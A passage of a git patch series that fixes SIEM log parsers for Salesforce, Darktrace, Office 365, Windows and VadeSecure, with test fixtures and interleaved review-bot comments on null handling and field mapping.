NT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}", "event": { "category": [ "network" @@ -41,7 +41,7 @@ }, "session": { "key": { - "id": "E6btf+6MZDOBIAEF" + "id": "session-key12323" } }, "user": { 
From 0b6ea3a3378799d0028d2b7d16e3085c2dde2799 Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Wed, 6 Nov 2024 16:10:27 +0200 Subject: [PATCH 008/150] Change salesforce user_agent --- Salesforce/salesforce-events/_meta/fields.yml | 5 +++++ Salesforce/salesforce-events/ingest/parser.yml | 2 +- .../tests/salesforce_apex_rest_api.json | 17 ++++------------- .../tests/salesforce_complete_event_1.json | 13 +++---------- 4 files changed, 13 insertions(+), 24 deletions(-) diff --git a/Salesforce/salesforce-events/_meta/fields.yml b/Salesforce/salesforce-events/_meta/fields.yml index ec92923ea..29be61136 100644 --- a/Salesforce/salesforce-events/_meta/fields.yml +++ b/Salesforce/salesforce-events/_meta/fields.yml @@ -117,3 +117,8 @@ salesforce.user.type: description: Salesforce user type name: salesforce.user.type type: keyword + +salesforce.user_agent: + description: Salesforce user agent + name: salesforce.user_agent + type: number diff --git a/Salesforce/salesforce-events/ingest/parser.yml b/Salesforce/salesforce-events/ingest/parser.yml index 7a3452fa9..01b66855f 100644 --- a/Salesforce/salesforce-events/ingest/parser.yml +++ b/Salesforce/salesforce-events/ingest/parser.yml @@ -72,7 +72,7 @@ stages: filter: "{{json_event.output.BROWSER_TYPE != None}}" - set: - user_agent.original: "{{json_event.output.USER_AGENT}}" + salesforce.user_agent: "{{json_event.output.USER_AGENT | int}}" filter: "{{json_event.output.USER_AGENT != None}}" set_source_ip: diff --git a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json index c6a4ab44a..2250f3670 100644 --- a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json +++ b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json 
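Review bot: `salesforce.user_agent: "{{json_event.output.USER_AGENT | int}}"` coerces any non-numeric USER_AGENT to 0, and the `salesforce_complete_event_1.json` change below pins exactly that (`"user_agent": 0`) while the commit drops `user_agent.original`, so for events whose USER_AGENT is a browser string the event ends up with a meaningless zero and no longer keeps the original string anywhere. The numeric code and the string form look like two shapes of the same source field and deserve separate targets; if the engine exposes Python str methods in filters, as the `.startswith(`/`.replace(` filters elsewhere in this series suggest, `.isdigit()` can split them and the `fields.yml` hunk stays correct for the numeric case.
```yaml
- set:
    salesforce.user_agent: "{{json_event.output.USER_AGENT | int}}"
  filter: "{{json_event.output.USER_AGENT != None and json_event.output.USER_AGENT.isdigit()}}"
- set:
    user_agent.original: "{{json_event.output.USER_AGENT}}"
  filter: "{{json_event.output.USER_AGENT != None and not json_event.output.USER_AGENT.isdigit()}}"
```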
@@ -1,9 +1,9 @@ { "input": { - "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}" + "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"12024001\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}" }, "expected": { - "message": 
"{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}", + "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"12024001\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}", "event": { "category": [ "network" @@ -46,7 +46,8 @@ }, "user": { "type": "Standard" - } + }, + "user_agent": 12024001 }, "source": { "address": "1.2.3.4", 
@@ -57,16 +58,6 @@ }, "user": { "id": "user123123123123" - }, - "user_agent": { - "device": { - "name": "Other" - }, - "name": "Other", - "original": "9999", - "os": { - "name": "Other" - } } } } \ No newline at end of file diff --git a/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json b/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json index bc1c801cf..051638d22 100644 --- a/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json +++ b/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json @@ -100,7 +100,8 @@ "user": { "initiated_logout": true, "type": "admin" - } + }, + "user_agent": 0 }, "source": { "address": "1.2.3.4", @@ -117,16 +118,8 @@ "id": "00530000009M943" }, "user_agent": { - "device": { - "name": "Other" - }, "name": "Chrome", - "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36", - "os": { - "name": "Windows", - "version": "10" - }, - "version": "93.0.4577" + "version": "93.0.4577.82" } } } \ No newline at end of file From 7038066ee4cf2d2eccace8489e664b58a5e80e55 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Thu, 7 Nov 2024 10:53:40 +0200 Subject: [PATCH 009/150] Fix Darktrace parser --- .../ingest/parser.yml | 23 +++++- .../tests/test_aianalyst_2.json | 79 +++++++++++++++++++ .../test_aianalyst_without_log_type.json | 10 +-- 3 files changed, 101 insertions(+), 11 deletions(-) create mode 100644 Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_2.json diff --git a/Darktrace/darktrace-threat-visualizer/ingest/parser.yml b/Darktrace/darktrace-threat-visualizer/ingest/parser.yml index f28c8ffae..4e77953a5 100644 --- a/Darktrace/darktrace-threat-visualizer/ingest/parser.yml +++ b/Darktrace/darktrace-threat-visualizer/ingest/parser.yml 
@@ -19,6 +19,8 @@ pipeline: output_field: datetime format: "%Y-%m-%d %H:%M:%S" - name: set_common_fields + - name: set_breach_devices_fields + filter: "{{json_event.message.breachDevices | length > 0}}" - name: set_aianalyst_fields filter: "{{json_event.message.log_type == 'aianalyst/incidentevents' or json_event.message.aiaScore != null}}" - name: set_modelbreaches_fields @@ -136,19 +138,32 @@ stages: {%- endif -%} {{filters}} - set_aianalyst_fields: + set_breach_devices_fields: actions: - set: device.id: "{{json_event.message.breachDevices[0].did}}" event.action: "{{json_event.message.breachDevices[0].title}}" - host.hostname: "{{json_event.message.breachDevices[0].hostname}}" host.id: "{{json_event.message.breachDevices[0].did}}" host.mac: "{{json_event.message.breachDevices[0].mac}}" + + - set: + host.hostname: "{{json_event.message.breachDevices[0].hostname}}" + filter: '{{not json_event.message.breachDevices[0].hostname.startswith("SaaS::")}}' + + - set: host.name: "{{json_event.message.breachDevices[0].identifier}}" - filter: "{{json_event.message.breachDevices | length > 0}}" + filter: '{{not json_event.message.breachDevices[0].identifier.startswith("SaaS::")}}' + + - set: + user.email: "{{json_event.message.breachDevices[0].hostname.split()[-1]}}" + filter: '{{json_event.message.breachDevices[0].hostname.startswith("SaaS::") and "@" in json_event.message.breachDevices[0].hostname.split()[-1]}}' + - set: host.ip: "{{json_event.message.breachDevices[0].ip}}" - filter: "{{json_event.message.breachDevices | length > 0 and (json_event.message.breachDevices[0].ip | is_ipaddress)}}" + filter: "{{json_event.message.breachDevices[0].ip | is_ipaddress}}" + + set_aianalyst_fields: + actions: - set: event.kind: "alert" event.category: "threat" diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_2.json b/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_2.json new file mode 100644 index 000000000..ebf8a69eb --- /dev/null 
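Review bot: The new `set_breach_devices_fields` filters call `.startswith("SaaS::")` directly on `breachDevices[0].hostname` and `breachDevices[0].identifier`; if either is null or absent (the fixture shows the sibling `ip`, `mac` and `subnet` fields as null, so the shape allows it) the filter would most likely raise instead of evaluating to false, and since the stage now runs for every event with a non-empty `breachDevices` rather than only aianalyst events, that reaches more event types than before. Guard the value first, e.g. `filter: '{{json_event.message.breachDevices[0].hostname and not json_event.message.breachDevices[0].hostname.startswith("SaaS::")}}'`, and likewise for the `identifier` and `user.email` filters. Whether widening the stage to all `breachDevices` events is intentional is not stated anywhere; a `description:` on the stage would make that explicit.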
+++ b/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_2.json 
@@ -0,0 +1,79 @@ +{ + "input": { + "message": "{\"summariser\": \"SaasHijackSummary\", \"acknowledged\": false, \"pinned\": false, \"createdAt\": 1730023348884, \"attackPhases\": [3], \"mitreTactics\": [\"privilege-escalation\"], \"title\": \"Possible Hijack of Zoom Account\", \"id\": \"204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\", \"children\": [\"204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\"], \"category\": \"critical\", \"currentGroup\": \"g204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\", \"groupCategory\": \"critical\", \"groupScore\": 21.063004966718992, \"groupPreviousGroups\": [], \"activityId\": \"da39a3ee\", \"groupingIds\": [\"3d2a2fc6\"], \"groupByActivity\": false, \"userTriggered\": false, \"externalTriggered\": false, \"aiaScore\": 93.67343783378601, \"summary\": \"The SaaS actor john.doe@example.com was observed making suspicious requests over a configured Zoom service from the IP 1.2.3.4.\\n\\nThis included requests made from unusual locations compared to the previous access locations observed from this actor and from the configured service in general.\\n\\nThough this behaviour could be the result of legitimate service usage or administration, it could also be a sign of this actor's account being hijacked by a malicious actor.\\n\\nConsequently, the security team may wish to confirm that this activity was legitimate and expected.\", \"periods\": [{\"start\": 1730023230000, \"end\": 1730023230000}], \"sender\": null, \"breachDevices\": [{\"identifier\": \"SaaS::Zoom: john.doe@example.com\", \"hostname\": \"SaaS::Zoom: john.doe@example.com\", \"ip\": null, \"mac\": null, \"subnet\": null, \"did\": 3820, \"sid\": -9}], \"relatedBreaches\": [{\"modelName\": \"SaaS / Access / Unusual External Source for SaaS Credential Use\", \"pbid\": 46769, \"threatScore\": 63.0, \"timestamp\": 1730023232000}], \"details\": [[{\"header\": \"SaaS User Details\", \"contents\": [{\"key\": \"SaaS account\", \"type\": \"device\", \"values\": [{\"identifier\": \"SaaS::Zoom: 
john.doe@example.com\", \"hostname\": \"SaaS::Zoom: john.doe@example.com\", \"ip\": null, \"mac\": null, \"subnet\": null, \"did\": 3820, \"sid\": -9}]}, {\"key\": \"Actor\", \"type\": \"string\", \"values\": [\"john.doe@example.com\"]}]}], [{\"header\": \"Agent Carrying out Suspicious Activity\", \"contents\": [{\"key\": \"Source IP\", \"type\": \"externalHost\", \"values\": [{\"hostname\": \"1.2.3.4\", \"ip\": \"1.2.3.4\"}]}, {\"key\": \"ASN\", \"type\": \"string\", \"values\": [\"AS2119 Telenor Norge AS\"]}, {\"key\": \"City\", \"type\": \"string\", \"values\": [\"Stockholm\"]}, {\"key\": \"Country\", \"type\": \"string\", \"values\": [\"Sweden\"]}]}, {\"header\": \"Summary of Activity\", \"contents\": [{\"key\": \"Time\", \"type\": \"timestampRange\", \"values\": [{\"start\": 1730023230000, \"end\": 1730023230000}]}, {\"key\": \"Suspicious properties\", \"type\": \"string\", \"values\": [\"Unusual time for activity\", \"Unusual external source for activity\"]}]}, {\"header\": \"Activity Details\", \"contents\": [{\"key\": \"Event\", \"type\": \"string\", \"values\": [\"Sign in\"]}, {\"key\": \"Number of events\", \"type\": \"integer\", \"values\": [1]}]}]], \"log_type\": \"aianalyst/incidentevents\"}" + }, + "expected": { + "message": "{\"summariser\": \"SaasHijackSummary\", \"acknowledged\": false, \"pinned\": false, \"createdAt\": 1730023348884, \"attackPhases\": [3], \"mitreTactics\": [\"privilege-escalation\"], \"title\": \"Possible Hijack of Zoom Account\", \"id\": \"204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\", \"children\": [\"204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\"], \"category\": \"critical\", \"currentGroup\": \"g204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\", \"groupCategory\": \"critical\", \"groupScore\": 21.063004966718992, \"groupPreviousGroups\": [], \"activityId\": \"da39a3ee\", \"groupingIds\": [\"3d2a2fc6\"], \"groupByActivity\": false, \"userTriggered\": false, \"externalTriggered\": false, \"aiaScore\": 93.67343783378601, \"summary\": \"The SaaS actor 
john.doe@example.com was observed making suspicious requests over a configured Zoom service from the IP 1.2.3.4.\\n\\nThis included requests made from unusual locations compared to the previous access locations observed from this actor and from the configured service in general.\\n\\nThough this behaviour could be the result of legitimate service usage or administration, it could also be a sign of this actor's account being hijacked by a malicious actor.\\n\\nConsequently, the security team may wish to confirm that this activity was legitimate and expected.\", \"periods\": [{\"start\": 1730023230000, \"end\": 1730023230000}], \"sender\": null, \"breachDevices\": [{\"identifier\": \"SaaS::Zoom: john.doe@example.com\", \"hostname\": \"SaaS::Zoom: john.doe@example.com\", \"ip\": null, \"mac\": null, \"subnet\": null, \"did\": 3820, \"sid\": -9}], \"relatedBreaches\": [{\"modelName\": \"SaaS / Access / Unusual External Source for SaaS Credential Use\", \"pbid\": 46769, \"threatScore\": 63.0, \"timestamp\": 1730023232000}], \"details\": [[{\"header\": \"SaaS User Details\", \"contents\": [{\"key\": \"SaaS account\", \"type\": \"device\", \"values\": [{\"identifier\": \"SaaS::Zoom: john.doe@example.com\", \"hostname\": \"SaaS::Zoom: john.doe@example.com\", \"ip\": null, \"mac\": null, \"subnet\": null, \"did\": 3820, \"sid\": -9}]}, {\"key\": \"Actor\", \"type\": \"string\", \"values\": [\"john.doe@example.com\"]}]}], [{\"header\": \"Agent Carrying out Suspicious Activity\", \"contents\": [{\"key\": \"Source IP\", \"type\": \"externalHost\", \"values\": [{\"hostname\": \"1.2.3.4\", \"ip\": \"1.2.3.4\"}]}, {\"key\": \"ASN\", \"type\": \"string\", \"values\": [\"AS2119 Telenor Norge AS\"]}, {\"key\": \"City\", \"type\": \"string\", \"values\": [\"Stockholm\"]}, {\"key\": \"Country\", \"type\": \"string\", \"values\": [\"Sweden\"]}]}, {\"header\": \"Summary of Activity\", \"contents\": [{\"key\": \"Time\", \"type\": \"timestampRange\", \"values\": [{\"start\": 
1730023230000, \"end\": 1730023230000}]}, {\"key\": \"Suspicious properties\", \"type\": \"string\", \"values\": [\"Unusual time for activity\", \"Unusual external source for activity\"]}]}, {\"header\": \"Activity Details\", \"contents\": [{\"key\": \"Event\", \"type\": \"string\", \"values\": [\"Sign in\"]}, {\"key\": \"Number of events\", \"type\": \"integer\", \"values\": [1]}]}]], \"log_type\": \"aianalyst/incidentevents\"}", + "event": { + "category": "threat", + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-27T10:02:28.884000Z", + "darktrace": { + "threat_visualizer": { + "acknowledged": false, + "activityId": "da39a3ee", + "aiaScore": 93.67343783378601, + "attackPhases": [ + 3 + ], + "breachDevices": [ + { + "did": 3820, + "hostname": "SaaS::Zoom: john.doe@example.com", + "identifier": "SaaS::Zoom: john.doe@example.com", + "ip": null, + "mac": null, + "sid": -9, + "subnet": null + } + ], + "category": "critical", + "children": [ + "204a3642-a6f1-4ac3-85d0-add7dd0c9f9b" + ], + "currentGroup": "g204a3642-a6f1-4ac3-85d0-add7dd0c9f9b", + "externalTriggered": false, + "groupCategory": "critical", + "groupScore": 21.063004966718992, + "groupingIds": [ + "3d2a2fc6" + ], + "mitreTactics": [ + "privilege-escalation" + ], + "periods": [ + { + "end": 1730023230000, + "start": 1730023230000 + } + ], + "relatedBreaches": [ + { + "modelName": "SaaS / Access / Unusual External Source for SaaS Credential Use", + "pbid": 46769, + "threatScore": 63.0, + "timestamp": 1730023232000 + } + ], + "userTriggered": false + } + }, + "device": { + "id": "3820" + }, + "host": { + "id": "3820" + }, + "observer": { + "name": "Darktrace", + "product": "Threat visualizer" + }, + "user": { + "email": "john.doe@example.com" + } + } +} \ No newline at end of file 
diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_without_log_type.json b/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_without_log_type.json index 3ba5ae570..b64c616de 100644 --- a/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_without_log_type.json +++ b/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_without_log_type.json @@ -66,18 +66,14 @@ "id": "2635" }, "host": { - "hostname": "SaaS::AzureActiveDirectory: test@test.fr", - "id": "2635", - "name": "SaaS::AzureActiveDirectory: test@test.fr" + "id": "2635" }, "observer": { "name": "Darktrace", "product": "Threat visualizer" }, - "related": { - "hosts": [ - "SaaS::AzureActiveDirectory: test@test.fr" - ] + "user": { + "email": "test@test.fr" } } } \ No newline at end of file From 880d24a71d5a4d57880fca0044b6f5452506dfb9 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Thu, 7 Nov 2024 11:40:45 +0200 Subject: [PATCH 010/150] Fix empty host.ip --- .../ingest/parser.yml | 20 +++++++++---------- .../tests/test_anomalous_file.json | 6 +----- .../test_device_attack_and_recon_tools.json | 6 +----- .../test_device_request_watched_domain.json | 6 +----- 4 files changed, 12 insertions(+), 26 deletions(-) diff --git a/Darktrace/darktrace-threat-visualizer/ingest/parser.yml b/Darktrace/darktrace-threat-visualizer/ingest/parser.yml index 4e77953a5..92a2d9ef2 100644 --- a/Darktrace/darktrace-threat-visualizer/ingest/parser.yml +++ b/Darktrace/darktrace-threat-visualizer/ingest/parser.yml 
@@ -54,17 +54,15 @@ stages: observer.name: "Darktrace" observer.product: "Threat visualizer" host.ip: > - {% if json_event.message.device.ips is not in [[], Null]%} - [ - {% for ip in json_event.message.device.ips %} - {% if ip.get("ip") %} - {% if ip["ip"] | is_ipaddress %} - '{{ip["ip"]}}', - {% endif %} - {% endif %} - {% endfor %} - ] - {% endif %} + {%- set host_ips = [] -%} + {%- for ip in json_event.message.device.ips -%} + {%- if ip.get("ip") | is_ipaddress -%} + {%- set host_ips = host_ips.append(ip["ip"]) -%} + {%- endif -%} + {%- endfor -%} + {%- if host_ips | length > 0 -%} + {{ host_ips }} + {%- endif -%} set_modelbreaches_fields: actions: diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_anomalous_file.json b/Darktrace/darktrace-threat-visualizer/tests/test_anomalous_file.json index 781d6cce6..49512bdeb 100644 --- a/Darktrace/darktrace-threat-visualizer/tests/test_anomalous_file.json +++ b/Darktrace/darktrace-threat-visualizer/tests/test_anomalous_file.json @@ -158,15 +158,11 @@ } }, "host": { - "id": "16", - "ip": [] + "id": "16" }, "observer": { "name": "Darktrace", "product": "Threat visualizer" - }, - "related": { - "ip": [] } } } \ No newline at end of file diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_device_attack_and_recon_tools.json b/Darktrace/darktrace-threat-visualizer/tests/test_device_attack_and_recon_tools.json index 90d9307b3..5092ebe13 100644 --- a/Darktrace/darktrace-threat-visualizer/tests/test_device_attack_and_recon_tools.json +++ b/Darktrace/darktrace-threat-visualizer/tests/test_device_attack_and_recon_tools.json @@ -118,15 +118,11 @@ } }, "host": { - "id": "16", - "ip": [] + "id": "16" }, "observer": { "name": "Darktrace", "product": "Threat visualizer" - }, - "related": { - "ip": [] } } } \ No newline at end of file 
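Review bot: The rewritten `host.ip` template drops the old `is not in [[], Null]` guard, so when the API delivers `device.ips` as `null` the `{%- for ip in json_event.message.device.ips -%}` loop presumably iterates over None and the stage fails instead of leaving `host.ip` unset; `{%- for ip in json_event.message.device.ips or [] -%}` keeps the new shape and the old tolerance. The `{%- set host_ips = host_ips.append(ip["ip"]) -%}` line works only because `append` mutates the outer list while the loop-scoped `set` result is thrown away; a one-line comment saying so (or `{%- do host_ips.append(ip["ip"]) -%}` if the `do` extension is enabled in this engine) would spare the next reader a puzzle. The `set_modelbreaches_fields` stage that follows continues outside the hunk.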
diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_device_request_watched_domain.json b/Darktrace/darktrace-threat-visualizer/tests/test_device_request_watched_domain.json index 9ae53b161..7866f9581 100644 --- a/Darktrace/darktrace-threat-visualizer/tests/test_device_request_watched_domain.json +++ b/Darktrace/darktrace-threat-visualizer/tests/test_device_request_watched_domain.json @@ -114,16 +114,12 @@ } }, "host": { - "id": "6", - "ip": [] + "id": "6" }, "observer": { "name": "Darktrace", "product": "Threat visualizer" }, - "related": { - "ip": [] - }, "service": { "name": "Slack" }, From 4d63741595f95d292e5454a4a5ce65b030613ae8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Gr=C3=A9goire=20Clermont?= <129874202+gcl-sekoia@users.noreply.github.com> Date: Thu, 7 Nov 2024 16:01:35 +0100 Subject: [PATCH 011/150] fix(o365): Parse ClientAppId in Exchange events --- Office 365/o365/ingest/parser.yml | 7 +++++++ Office 365/o365/tests/clientipadress.json | 5 +++++ Office 365/o365/tests/exchange_item_update.json | 5 +++++ Office 365/o365/tests/inbox_rule.json | 5 ++++- 4 files changed, 21 insertions(+), 1 deletion(-) diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml index 62a4098df..13036065f 100644 --- a/Office 365/o365/ingest/parser.yml +++ b/Office 365/o365/ingest/parser.yml @@ -164,6 +164,10 @@ stages: filter: '{{json_event.message.get("Parameters") != None}}' - set: office365.context.aad_session_id: "{{json_event.message.SessionId}}" + office365.context.client.id: "{{json_event.message.ClientAppId}}" + - set: + office365.context.client.id: "{{json_event.message.AppId}}" + filter: '{{json_event.message.get("ClientAppId") == ""}}' parse_exchange_item: actions: 
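Review bot: The fallback `filter: '{{json_event.message.get("ClientAppId") == ""}}'` fires only when `ClientAppId` is present and empty; an event that lacks the key entirely (`get` returns None) matches neither action, so `office365.context.client.id` presumably renders empty from the first `set` and `AppId` is never consulted. `filter: '{{ not json_event.message.get("ClientAppId") }}'` covers both the missing and the empty case. The three later hunks (`@@ -189`, `@@ -237`, `@@ -254`) set `office365.context.client.id` from `ClientAppId` alone with no `AppId` fallback — if that asymmetry is intended, a comment next to this fallback stating that only this stage falls back to `AppId` would document it.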
@@ -189,6 +193,7 @@ stages: user.id: "{{json_event.message.LogonUserSid}}" office365.exchange.mailbox_guid: "{{json_event.message.MailboxGuid}}" office365.context.aad_session_id: "{{json_event.message.SessionId}}" + office365.context.client.id: "{{json_event.message.ClientAppId}}" - set: email.subject: "{{json_event.message.Item.Subject}}" email.message_id: "{{json_event.message.Item.InternetMessageId[1:-1]}}" @@ -237,6 +242,7 @@ stages: ] - set: office365.context.aad_session_id: "{{json_event.message.SessionId}}" + office365.context.client.id: "{{json_event.message.ClientAppId}}" parse_share_point: actions: - set: @@ -254,6 +260,7 @@ stages: actions: - set: office365.context.aad_session_id: "{{json_event.message.SessionId}}" + office365.context.client.id: "{{json_event.message.ClientAppId}}" parse_network_traffic: actions: diff --git a/Office 365/o365/tests/clientipadress.json b/Office 365/o365/tests/clientipadress.json index c20107759..6f5c9ac9d 100644 --- a/Office 365/o365/tests/clientipadress.json +++ b/Office 365/o365/tests/clientipadress.json @@ -23,6 +23,11 @@ "target": "user" }, "office365": { + "context": { + "client": { + "id": "clientappidxxxx-xxx-xxx-xxxx" + } + }, "record_type": 50, "result_status": "Succeeded", "user_type": { diff --git a/Office 365/o365/tests/exchange_item_update.json b/Office 365/o365/tests/exchange_item_update.json index ad69be989..30682248f 100644 --- a/Office 365/o365/tests/exchange_item_update.json +++ b/Office 365/o365/tests/exchange_item_update.json @@ -29,6 +29,11 @@ "subject": "HI" }, "office365": { + "context": { + "client": { + "id": "037fd006-a72b-49ae-4bb0-08dba30c8729" + } + }, "exchange": { "mailbox_guid": "8208550a-4001-439d-a9f6-e95d76767507" }, diff --git a/Office 365/o365/tests/inbox_rule.json b/Office 365/o365/tests/inbox_rule.json index 8af518085..f3609c050 100644 --- a/Office 365/o365/tests/inbox_rule.json +++ b/Office 365/o365/tests/inbox_rule.json 
@@ -21,7 +21,10 @@ "object_id": "EURPR07A010.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/example.onmicrosoft.com/bc1b1df3-f861-4aec-bf7c-40ce5b5566c1\\RULE_NAME" }, "context": { - "aad_session_id": "984c0958-0631-4b90-b116-15094fc36847" + "aad_session_id": "984c0958-0631-4b90-b116-15094fc36847", + "client": { + "id": "00000002-0000-0ff1-ce00-000000000000" + } }, "exchange_admin": { "parameters": [ From 1722cb45207026aa7f8802b095f9ffb60f25f7b7 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Fri, 8 Nov 2024 09:18:29 +0200 Subject: [PATCH 012/150] Fix windows --- Windows/windows/ingest/parser.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml index 5fc6b2eec..e21ec0b94 100644 --- a/Windows/windows/ingest/parser.yml +++ b/Windows/windows/ingest/parser.yml @@ -24,6 +24,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{json.event.Message}}" output_field: result value_sep: ":" From 5108adaff0f103cfa4a6e28e6c191fc80ae21c4c Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Fri, 8 Nov 2024 12:19:44 +0200 Subject: [PATCH 013/150] Fix connector UUID --- VadeSecure/vade_secure_m365/_meta/manifest.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/VadeSecure/vade_secure_m365/_meta/manifest.yml b/VadeSecure/vade_secure_m365/_meta/manifest.yml index da4658b6a..49acafa59 100644 --- a/VadeSecure/vade_secure_m365/_meta/manifest.yml +++ 